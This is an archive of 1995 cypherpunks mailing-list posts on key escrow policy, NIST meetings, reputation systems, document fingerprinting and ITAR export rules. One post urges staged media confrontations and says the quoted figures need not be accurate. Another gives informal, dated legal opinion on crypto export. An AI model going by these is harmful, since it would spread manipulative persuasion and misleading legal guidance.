   Government's proposed system will be built into the
   Internet by a dozen countries, and American companies and
   individuals would be foolish not to use it.

   At that point, millions of Americans will come into direct
   conflict with Government policy, and the popular
   gun-control bumper sticker may be replaced by one that says
   "If cryptography is outlawed, only outlaws will have
   cryptography."

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Mon, 11 Sep 95 09:10:34 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Brian Davis' cypherpunk GAK proposal
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: </2DVwMz2Bo9Q083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995 21:25:26 -0400 (EDT),
Brian Davis <bdavis@thepoint.net> wrote:
} 
} I, of course, know of the "dislike" of GAK here.  I am curious to know, 
} however, if the "dislike" is because government would have access under 
} any circumstances or if the primary worry is that government will cheat 
} and get access when most would agree that they shouldn't (either by the 
} judge "cheating" or a TLA stealing it).
 
You leave out something here when you say `the judge "cheating"'.
Most of the proposals and draft legislation include words like
"or by other lawful authority" along with the provisions empowering
judges to grant access to keys.  Some versions will list various 
combinations of the Attorney General, Director of {TLA}, etc, as
explicitly empowered.  Other versions don't explicate the phrase,
perhaps trusting that those with the need will already know where
their lawful authority lies -- maybe in an anti-terrorist Executive
Order; maybe in legislation authorizing military support in drug
interdiction; perhaps in their organization's charter to protect
"national security".

Part of the concern is that spooks will have routine access to keys
without any cheating -- no stealing or bent judges will be required.
The War on Drugs, the War on Firearms, the War on Terrorists
(on Money Lauderers, on Pedophiles, on Spies) are just too important.

} In other words ... if it took agreement by a review board composed of 
} non-LEA members of this list, would the escrow be acceptable??

This would not be acceptable to the government.  Very many sincere,
patriotic government agents believe they currently have the right 
and the responsibility to monitor the civilians' possibly-illegal 
activities.  Your hypothetical review board of cypherpunks would 
unacceptably limit their established right to gather evidence and
intelligence.  Investigations too sensitive to mention here, would
be crippled.  Unless of course, you intended that "or by other lawful
authority" would be included in your scheme?

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Lou Poppler <lwp@mail.msen.com> | "Understanding is a three-edged      ::
::    http://www.msen.com/~lwp/    | sword..."-- Ambassador Kosh, Babylon5::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Mon, 11 Sep 95 09:53:47 PDT
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: Progress and Freedom Conference this Summer
In-Reply-To: <v02120d06ac79f1eb4cbd@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.950911094646.9226B-100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Sep 1995, Robert Hettinga wrote:
> 
> I just saw this thing on CSPAN, and I thought it was way cool. Here's how
> to get it from CSPAN in case they don't run it again.
> 
> Cheers,
> Bob Hettinga

During the program, which was *very* interesting, it was announced by
CSPAN that they would carry the remainder of the meeting next Sunday
Sept. 17.  Check w/them for the time locally.

Chuck Lewton
Redmond, WA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 11 Sep 95 09:44:42 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: question about reputation
Message-ID: <ac79b3f9090210046cde@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


How reputation systems work is an important issue. I hope we can discuss it
further.

At 10:32 PM 9/10/95, Wei Dai wrote:

>In an economy based on positive reputations, how does one acquire a
>reputation capital?  One way may be to initially perform services at a
>price below cost, but this has some problems.
>
>For example, Alice starts a anonymous consulting service, and announces
>that she will answer the first ten queries for free.  Upon hearing this,
>Mallet immediately starts another consulting service, and announces the
>same offer.  At this point Mallet can simply forward his customers'
>queries to Alice and Alice's answers back to his customers.  Thus, he gains
>reputation at no cost.
>
>On the other hand, this "man-in-the-middle" attack can also work against
>conventional True Name based services, but perhaps with less effect.  Has
>anyone ever heard of this being done?

This line of reasoning is a variant of the "Chess Grandmaster" scheme,
wherein one gains the reputation of a chess grandmaster by echoing the
moves of a chess grandmaster playing in another game. I believe this is
described in various crypto books, but I haven't looked it up here.

In practice, nothing so simple as an "Ask any 10 questions" would be a
practical way to gain reputation. If Alice is trying to build up a rep,
she'll choose her customers with some care, or make sure that alternate
channels also exist.

>Is there a better way to acquire a good reputation?

Directly contacting a larger group, such as this list, is usually a faster
and better way to build a reputation than in, say, answering only questions
directly made. Admittedly, many consulting cases involve direct contacts.

However, the reputation of a Pr0duct Cypher, or a Black Unicorn, or a Tim
May, or a Wei Dai, is usually made in a public forum, not primarily in
one-on-one contacts. While not all of us sign our posts, the principal is
roughly the same: we are communicating directly, so man-in-the-middle
attacks, or "Chess Grandmaster" attacks, are fairly ineffective.

And practically speaking, if someone hires _me_ as a consultant, it is
probably based on past achievements, through multiple channels. This would
apply to digital pseudonyms as well, though not as directly.

(Humorous Sidenote: an informal variant of the Chess Grandmaster approach
is to use the best arguments found on one list on _another_ list. Another
variant, widely used, is to adopt the best arguments of others and use them
one's self (oneself?). This is how memes spread, and is central to the
advancement of knowledge.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 11 Sep 95 07:12:59 PDT
To: www-buyinfo@allegra.att.com
Subject: e$: Progress and Freedom Conference this Summer
Message-ID: <v02120d06ac79f1eb4cbd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


There was a pointer here to an article in the NYT or WSJ about the
conference this summer of the Progress and Freedom Foundation, with muchos
net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth,
etc.) in attendence. Topics were mostly about e$ and the
causes/consequences thereof.

I just saw this thing on CSPAN, and I thought it was way cool. Here's how
to get it from CSPAN in case they don't run it again.

Ask for Tape number 57759-63
CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00


CSPAN
Department 53
Washington, DC 20055

In case I botched something above, or you want to put this on your favorite
book-entry transaction account ;-), CSPAN's phone number is 202-737-3220
and ask for Viewer's Services.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Mon, 11 Sep 95 07:13:08 PDT
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: question about reputation
Message-ID: <9509111414.AA29512@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 03:32 PM 9/10/95 -0700, Wei Dai wrote:

>For example, Alice starts a anonymous consulting service, and announces 
>that she will answer the first ten queries for free.  Upon hearing this, 
>Mallet immediately starts another consulting service, and announces the 
>same offer.  At this point Mallet can simply forward his customers' 
>queries to Alice and Alice's answers back to his customers.  Thus, he gains 
>reputation at no cost.

        As a response to this example.  I'd argue Mallet has less of a
reputation because:
        (1) if this example applies to the first 10 questions from each
person, Alice will answer many more questions that Mallet.  (Mallet answers
10 and is done.)
        (2) if this example means the first 10 questions from anywhere
Mallet than has to arrange to have his customer's 10 questions in the queue
and ready to go before any other person can get in the queue, which is some
work.
        
        In general, I'd think reputation is akin to brand name to a degree.
Differentiation!  So, if Alice notices people tracking her "reputation
advertising" she can change it.  Reputation might not be as static a concept
as we think (as others have mentioned by bringing up arbitrage.)

-------------------------
Regards,                   
Joseph M. Reagle Jr.     http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu           0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 11 Sep 95 07:42:06 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Clinton's Black Helicopters Over My House!
In-Reply-To: <ac6fd3aa0202100430a8@[205.199.118.202]>
Message-ID: <m0ssAWm-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> ObConspiracy content: high.
> 
> They are coming to take me away, take me away!
> 
> Clinton's black helicopters are swooping low over my house.
> 
> What should I do?

...
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."

About a month ago I walked by California Pizza Kitchen just south
of Dupont circle and Clinton was there eating with his family in a 
full restaurant...

Too bad I didn't have my RSA T-shirt yet... BTW, I sent money ages ago.

My 'Cypherpunk Criminal' shirt is just about worn out.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 11 Sep 95 09:58:16 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on GAK
Message-ID: <199509111516.LAA11450@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>   "If this fails," said a figure familiar with the
>   Administration's thinking on the proposed change in
>   cryptographic policy, "it's going to lead to a very
>   divisive debate. And the irony, for libertarians who oppose
>   key escrow, is that if it fails, I am convinced that Louis
>   Freeh cannot be true to his job without proposing domestic
>   controls on data encryption."
>
>   "He's not going to give up without a fight, and neither is
>   the Justice Department," said the figure, who spoke on the
>   condition he not be identified.

It worked during WWII but will it work now?  After all, locking up Japanese
Americans worked during WWII, but would not work now.

Note that the NSA abandoned their "born secret" stance on cryptographic
technology when it became impossible to sustain.  And when R, S, & A
together with MIT decided to publish "A Proposal for a Public Key Encryption
System" in spite of NSA threats, the Agency folded.  That represented a
genuine surrender.

We'll see if Louis has more balls than the NSA did.  Widespread resistance
is likely.  Court tests will be entertaining.

At this point in the discussion, someone always pipes up and says that even
if cypherpunks fail to obey a crypto ban, businesses will fall into line
like the good sheep they are.  This prediction ignores some important facts
about modern businesses.  First, many small businesses already routinely
ignore government mandates in hiring, the use of independent contractors,
environmental regulation, and taxation.  These entities can be counted upon
to resist crypto controls as well (if they feel like using crypto0.  Second,
a growing number of businesses are headed by explicit libertarians or right
wing nuts.  These people have already engaged in a lot of resistance to
crypto regulation and can be counted on for more resistance.  Additionally,
if strong crypto confers a competitive advantage on users, use will be
encouraged.

Does anyone have a handle on exactly how a crypto ban would be carried out.
would regulation (if so, which ones) or legislation be used?  The exact
details will make a big difference in considering avoidance strategies. 

DCF

"Blatant Advertisement --- If anyone needs someone to string 'words in a
line' for them, my services are available."


 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Sep 95 09:13:23 PDT
To: cypherpunks@toad.com
Subject: VER_tgo
Message-ID: <199509111613.MAA02185@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-11-95. W$Japer:


   "VeriFone Expected to Announce System For Purchasing Goods
   on the Internet."

      VeriFone, Inc., which manufactures terminals through
      which merchants scan consumers' credit cards for
      authorization, said it will provide merchants who wish
      to market goods on the global computer network with a
      complete set of tools to handle electronic cash,
      electronic checks and credit-card payments. The system
      consists of four different products: A consumer would
      use the software equivalent of a wallet, which could
      include different forms of payment, such as electronic
      checks, cash, or credit cards to purchase goods. The
      consumer would also use a smartcard inserted in a device
      connected to a PC to verify his identity. The card would
      also contain other cardholder information and eventually
      could include electronic cash.


   Philips and Oracle Plan Electronic Mail Without Use of PCs

      Philips Electronics NV and Oracle Corp. plan to offer
      electronic mail without personal computers, using
      Philips phones that have small display screens and
      keyboards. Gerrit Schipper, president of Philips Home
      Services, said the new e-mail service was designed to
      increase the services' value and appeal to the 70% of
      U.S. households that don't have PCs.


   2 go: VER_tgo (5 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 11 Sep 95 12:36:58 PDT
To: cypherpunks@toad.com
Subject: Re: question about reputation
Message-ID: <v02130501ac7a4c166b62@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


Actually about a year ago I was working on a project to help merge
electronic tokens and 'reputation'. The idea was to reinforce contributions
to the net and acknowledge them in a tangible manner The classic
method of gauging respect has become more difficult as the growth of the net
has resutlted in a surfeit of citizens who simply haven't learned the idea
of contribution and net community, nor how to judge the level of respect
that others have.

We'd seed a certain # of tokens amongst FAQ maintainers, moderators, and
those who are active in helping on lists and forums. A group would be
chosen to help decide how to split up the seed tokens. This group would not
be eligible for any tokens themselves (they'd be selected from those we
felt were the most active, oddly they'd be earning old style respect, that
is contributing their time in distributing tokens without being able to
earn any.)

Still under discussion was how to bring more tokens into the system. One
was to continue to distribute tokens based on a standard for certain
actions and further nominations as judged by the council (which would
change membership itself over time.) The second was to have an actual
foundation set up to accept contributions to be distributed to other net
related non-profits. Thus for those who don't have the time or knowledge
base to contribute to the net, they can actually contribute money to aid
net-related groups.

The tokens could be exchanged when people answer questions, as favors. Part
of the money from the foundation would be to have gatherings which would
'cost' tokens, so those who have put in their time and labor could mix and
listen to speakers, enjoy a nice dinner, etc.

Anyway, just interesting to see the topic come up now in the Cypherpunk
community. At the time, there were still some barriers between the
objectives
we were given by different people paying our own checks on the matter.
Perhaps the idea of 'Friends of the Net' is now more pertinent.

Feel free to drop me some email or cc back to the list. If enough people
are interested, I'll look into the subject again.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 11 Sep 95 13:15:16 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re:  Digital Fingerprinting
Message-ID: <v02120d0cac7a3111ef30@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>I'm not sure how to do it for software, but for novels it should be easy
>to fingerprint.  Every couple of pages the author writes a sentence twice
>in different forms.  This would not take a great deal of extra effort on
>the part of the author.  Software can then choose from the alternative
>variations in different patterns to produce a unique fingerprint for
>every copy.
>

One of the points that I'm exploring is "what kind of transformation
makes for an un-fuzzable fingerprint bit." This example seems to fall
into the same bin as the "two cameras" approach; the two sentences come
out of the author's head in the same way that the two cameras are pointed
at the same piece of reality.

>There would seem to be two approaches to removing the fingerprint.
>One would be re-writing every sentence in the novel.  The other would be
>to collect enough copies to identify all of the sentences which have
>variations.  Most of the mathematics of fingerprinting research is
>oriented around figuring out how many different points of variation there
>must be to be secure against a certain number of copies of the
>fingerprinted item being compared.

Right. All of these approaches, however, assume unforgeable bits, either
by obscurity of insertion, or by means that are analagous to the "two
cameras" approach. I'm trying to come up with a robust definition of
"two cameras-ness", any suggestions appreciated.
>
>Perhaps a similar approach could be applied to software, where in many
>cases a couple of statements could be trivially interchanged, or other
>kinds of simple transformations could be manually generated.  Those
>could be marked by the programmers without too much extra work.
>

The problem with changes like this is that if they're trivial enough
not to require retesting, etc., then once hackers know the accepted
range of modification, they can completely fuzz them up. Various
other schemes such as reordering object modules fall into this as
well. The problem with software is that it can be reverse-compiled,
then compiled again. Unless you're willing to define a series of branches
that really do different things (and are not so trivial to be
expressed as algorithmic variants), then bits can be fuzzed. If you
_do_ write these branches, you are in for a rough time when it comes
time to do quality assurance on your software.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 11 Sep 95 10:13:49 PDT
To: jya@pipeline.com (John Young)
Subject: Re: NYT on GAK
In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
Message-ID: <199509111713.NAA06281@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Its a good thing the administration only wants to outlaw
cryptography, not anonymity.

Adam


|    The New York Times, September 11, 1995, p. D7.
| 
| 
|    Technology / Peter H. Lewis
[...]
|    "If this fails," said a figure familiar with the
|    Administration's thinking on the proposed change in
|    cryptographic policy, "it's going to lead to a very
|    divisive debate. And the irony, for libertarians who oppose
|    key escrow, is that if it fails, I am convinced that Louis
|    Freeh cannot be true to his job without proposing domestic
|    controls on data encryption."
| 
|    "He's not going to give up without a fight, and neither is
|    the Justice Department," said the figure, who spoke on the
|    condition he not be identified.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Sep 95 11:22:01 PDT
To: pfarrell@netcom.com
Subject: NIST Hat Tricks
Message-ID: <199509111719.NAA08676@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat,


A response to the quote below from your NIST Key Escrow web 
site:


I got the full Discussion Paper #4 with all ten criteria from 
the main desk, along with others that seemed to be appearing as 
the day passed. (I'll fax a copies of any of the handouts to 
anyone wanting hardcopy. We scanned all handouts.)


In breakout session B-2, we were also given only that part of 
Paper #4 that dealt with our session's criteria 3, 4 and 9. It 
was passed out at the end of the meeting after discussion had 
ceased. We did not get a chance to discuss the "example 
potential solutions."


Strange procedure: it seemed as if NIST was sleight-of-handing 
prepared backup papers as if they anticipated resistance. Maybe 
there would have been more concessions or more rabbits pulled 
from the KE hat if there had been even louder "brrrrat-GAK."


Never too late to ask for those other trapped bunnies.


----------

[Excerpt from Pat's web site]:

     * During the first breakout session, in the technical 
discussion of
       criteria # 5 and #6, an authorless (presumably 
government issued)
       "Example Potential Solutions" paper was distributed. It 
caused a
       lot of grumbling amongst the attendees, as they were 
supposed to
       discuss it, without any prior chance to read or react to 
it. Here
       are two versions of it, First, Anonymous Sample 
Solutions (HTML by
       PDF) and a simple ASCII version Sample Solutions (ASCII 
text by
       John Young)
       
       I have not seen an electronic version of the paper that 
I
       received. It contains the following paragraph:
       
       "Example Solutions to export criteria 5 and 6 are 
indentified
       below to help give a better feel for approaches that 
implementors
       may take to satisfy the criteria. The information in 
this paper is
       not intended to represent fail-sfe, cookie cutter 
solutions to the
       criteria, but only to generate more detailed 
discussions."
       
       It is also interesting to note that John Young has an 
electronic
       document with all of the sample solutions (a solution 
for each of
       the ten criteria. I never saw a paper document with all 
ten
       solutions. The one that was handed to me had only two 
criteria, #5
       and #6. I talked to attendees of other breakouts, and 
they had
       received nothing.
       





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 11 Sep 95 13:39:37 PDT
To: cypherpunks@toad.com
Subject: crypto confrontation
Message-ID: <199509112036.NAA10670@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


regarding the NIST policies on cryptography being shaped at this
moment, an idea occurred to me.

one of the most important aspects of protest is getting the public
to be on your side. right now the american public is pretty indifferent
about the cryptography issue, but there could be some very graphic
situations that would help bring it out into the limelight even
more than it is at the moment, and make anyone promoting government 
key escrow seem like the bad guys.

the minor protest going on with the Perl t-shirts is really fantastic
(last count, ~700 shirts out the door), but what really brings an
issue to the forefront of american consciousness (i.e. the media)
is *confrontation*.

picketers in front of buildings clashing with police is almost 
guaranteed to get a little media coverage, almost no matter what
the issue.

now, some day we might reach this point with crypto rights. it would
be quite a spectacle. (I'm sure people would argue against it here,
but IMHO even a simple demonstration of a few dozen people might
do more for widespread public consciousness of the issue than a
million lines of code on an FTP site..)

--

in the meantime here's another possibility:

suppose that a software company intentionally set up a situation where
they are exporting a cryptographic algorithm out of the country. and
they have filming crews on hand when the bad-guy customs agents or
whoever stop the truck at the border and confiscate the software. have the 
reporters asking questions like "why are you confiscating this"? "answer: this
is classified a munition". 

this could really be a fantastic segment for Hard Copy or any of the
other trashy tabloid shows. just a confrontration for confrontation's
sake, with nothing resolved, just a lot of people pissed off at each
other, and the end result the viewer coming away saying, "what a disgrace!!
somebody should do something!!"

I mean, imagine a segment where you see the customs officers pointing
guns at a truck driver or whatever (that would *really* be optimal), and
them breaking into the truck to pull out the software. the reporter
could say, "what's so deadly that's in the box??" and pull out a computer
disk. 

sound bites of people outside the country saying how they want to use
the crypto. a nice businessman in a tie, in the middle of an office
with hardworking suits and ties.
"we're not criminals!! we're trying to *protect* ourselves
from criminals!! but your government won't let us!!"  other sound bites:
joe sixpack goes and buys crypto package from Germany because he doesn't
have to put up with illegality and uncle sam. shots of massive Microsoft
and an executive or programmer complaining 
how they can't put the code they want to in their programs, that
users *want*, that would solve these horrible hacker problems that the
country is having,  because uncle sam is interfering.

other scenes: businessmen calculating how much the U.S. software market
(which, BTW, we are premiere in the world in) has already lost in
sales, or could potentially lose on the information highway. "my
company personally had [x] ready but could not release it. [y] was
delayed [z] years for approval. we estimate we have lost [a] and
have had to hold off hiring as much as [b] people". (the actual numbers
should be as close to reality as possible, but from a PR point of view
don't even matter!!)

much made of how the Internet committees are now ignoring the US 
recommendations that require escrowed crypto. "the U.S. may ironically become 
only a inconsequential rest stop on the information superhighway of the future"
much FUD about how the US could become a "backwater in cyberspace" 
because of these policies. etc!!  lots of hype about how cyberspace
will become the very basis of future global economies, and that anybody
who opts out will be slitting their own throat. also, crypto being absolutely
essential to secure transactions.

in fact, if we play this right we could even get a new kind of 
semi-conventional wisdom into that easily-manipulated thing called
the public consciousness: "hackers can be foiled by good crypto.
the government is killing good crypto. therefore hackers are proliferating
because of the government!!"

plus, you could throw in the Phil Zimmermann thing too, although that
might be overdoing it. as for all the bill of rights angle and those
kinds of things, those could be put in there, but remember that people
generally hate lawyers <g>

--

actually, I'm actually rooting for PRZ to be indicted. an acquittal would
be extremely costly, but it could really bring the key issues to the 
forefront of the american or even world consciousness. hell, it would
beat the OJ trial any day in my book!! and in fact it might be just
the ticket to the kind of mainstream journalism that could really
tip the balance of public opinion. (the press is pretty sleazy, I 
admit, but it is a *monster* machine that one might be able to
trick into working for you!! in fact, I would consider that quite the
ultimate hack in social engineering!! any weenie hacker can con a
phone repairman, but can you trick the whole U.S. media system into
telling the public what you want it to hear? sounds like a real 
challenge to me!!)

and BTW, I am aware of how DJBernstein and others have various lawsuits
and FOIAs against the government. but I don't think these are really
penetrating Joe Sixpack's brain, when that is really where the battle
lies. and Joe Sixpack doesn't understand esoteric things like the
bill of rights, the constitution etc.-- but he does understand pictures
of police confronting someone who doesn't seem to be doing anything wrong 
and is arguing in favor of something good for america.

you might think, "what does public opinion have to do with government?"
answer: a lot. if in a public poll, a large majority were in favor of
releasing crypto regulation, you can bet that the "which way is the
wind blowing NOW?!?!?!" politicians (that is, all of them, <g>)
would be scrambling to appease the public. even Clinton has a long
record of merely going with what is politically expedient. I can fully
imagine him defying key law-enforcement agencies if the public was
more in support of good crypto.

and, if we can get scenes like what I'm talking about, that day may
become a reality. I continue to believe that the way to really hammer
the issue and get what we want may amount to a kind of "psychological
terrorism": "propaganda" on television that promotes our cause to joe
sixpack, and simply honestly tells what is at stake. (that's the 
beauty of our position, is that even the simple truth is very powerful
propaganda-- in fact that's how you can generally tell if you are on
a side that is likely to win in the long run!!).

there are many here who will argue for less confrontational approaches,
about not getting anyone upset, about not trying to paint anyone as
a bad guy, about just opting out of a "hopeless" political process, about how
the whole US system is so screwed up anyway that we're all pretty
much screwed when it comes down to it, etc. ad nauseaum, ...

but IMHO a pound of nonconfrontration is worth a feather of confrontation
in the long run. and I continue to believe the confrontation, while
a bit messy and unpleasant at times, will really get the ultimate result
that we want: (1) widespread public consciousness on the issue, 
(2) widespread support of our side.

again, the code distribution is great, but in the long term, I continue
to believe that public opinion is ultimately what runs a government,
and a tyrannical government cannot exist without the tacit support of
the population. 

I applaud the Perl t-shirt sellers for their great victory but suggest
that greater victories lie in waiting. how about a demonstration of
a bunch of people wearing the shirts, for starters?


--Vlad Nuri






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Mon, 11 Sep 95 13:54:22 PDT
To: cypherpunks@toad.com
Subject: More NIST presentations available
Message-ID: <199509112050.NAA11447@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've collected more presentations and comments for last week's NIST GAK
meeting. I've got CDT's presentation and new policy response, VTW's 
presentation, and David Lesher's post from talk.politics.crypto.

htpp://www.isse.gmu.edu/~pfarrell/nistmeeting.html
is the starting point.

If you seem more, please forward it to me. Thanks
Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Sep 95 14:49:31 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: question about reputation
Message-ID: <199509112148.OAA08494@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 9/11/95 -0700, Tim wrote:
>(Humorous Sidenote: an informal variant of the Chess Grandmaster approach
>is to use the best arguments found on one list on _another_ list. Another
>variant, widely used, is to adopt the best arguments of others and use them
>one's self (oneself?). This is how memes spread, and is central to the
>advancement of knowledge.)

John Young uses this approach, quite effectively; his source lists are
the New Yawk Times and Wall Street Journal, and the reputation he's built
by forwarding the material has been quite good, in spite of the dubious
sources of his information :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Sep 95 15:17:43 PDT
To: Todd Ackman <tka@brutus.bright.net>
Subject: Re: itar question
Message-ID: <199509112217.PAA14304@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:08 PM 9/11/95 -0400, you wrote:
>If I create a set of patches to a PD or GNU software package (i.e. telnetd, 
>httpd) to support encryption (in particular SSL), can i put the patches up 
>on an ftp site, Or would i be in violation of itar, and therefore risk 
>getting hauled off by the feds?  (i'm a us citizen living/working in the 
>states).

If you create them in the states, and export them, and they contain crypto,
you can be busted and convicted.

If you put them on an ftp site without preventing or at least discouraging
foreigners from accessing them, you can be busted, but you've at least got 
a potentially interesting court case about freedom of speech and the press,
etc.,
for which you will need _very_ good lawyers unless either 
a) Phil Zimmermann gets indicted and acquitted first or b) you don't mind
losing. 
If you do b) before Phil gets his day in court (as opposed to his 
months and months of grand jury), you risk creating a precedent that
can help the Bad Guys convict him.

If you create them in the states, and they contain hooks to call crypto,
but don't actually contain the crypto themselves, then there's a question
of whether they are components of a munition or technical data therefor,
or whether they're just code that calls subroutines named "SSL_init()",
"DES()", "RSA()", etc., which is behavior that's at least been threatened
with FUD,
but may be defendable in court.  Your case is definitely stronger if your
code is public domain (by the ITAR definitions, which are rather different
than the copyright-related definitions), and of course if it's part of a working
system of purely non-munitions code that just happens to have routines like
"Do_Everything_Slowly()", "Reliability_Supporting_Algorithm(), and
"SUPDUP_Simulation_Library" -- might even be fun to write a library like that,
though I suppose certain companies might be upset if you called your
Really_Special_Arithmetic library RSAREF :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@rand.org (Jim@rand.org)
Date: Wed, 20 Sep 95 17:18:24 PDT
To: cypherpunks@toad.com
Subject: Clipper: the definitive meme
Message-ID: <9509201550146386@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 11 Sep 95 08:26:42 PDT
From: Jim Gillogly <jim@rand.org>


T-shirt!!  T-shirt!!

        Jim Gillogly
        Trewesday, 20 Halimath S.R. 1995, 15:26

------- Forwarded Message

From: wtshaw@aol.com (WTShaw)
Newsgroups: talk.politics.crypto
Subject: Re: Impressions of the NIST meeting
Date: 11 Sep 1995 04:50:27 -0400

In the world of Jet-Age crypto, the government offers up a biplane, and
seek to reserve the second seat for themselves.

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 11 Sep 95 06:40:40 PDT
To: cypherpunks@toad.com
Subject: Comp Sec Calendar
Message-ID: <199509111339.PAA09319@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>From URL: http://csrc.ncsl.nist.gov/events/eventcal.txt


Last update: 07/24/95

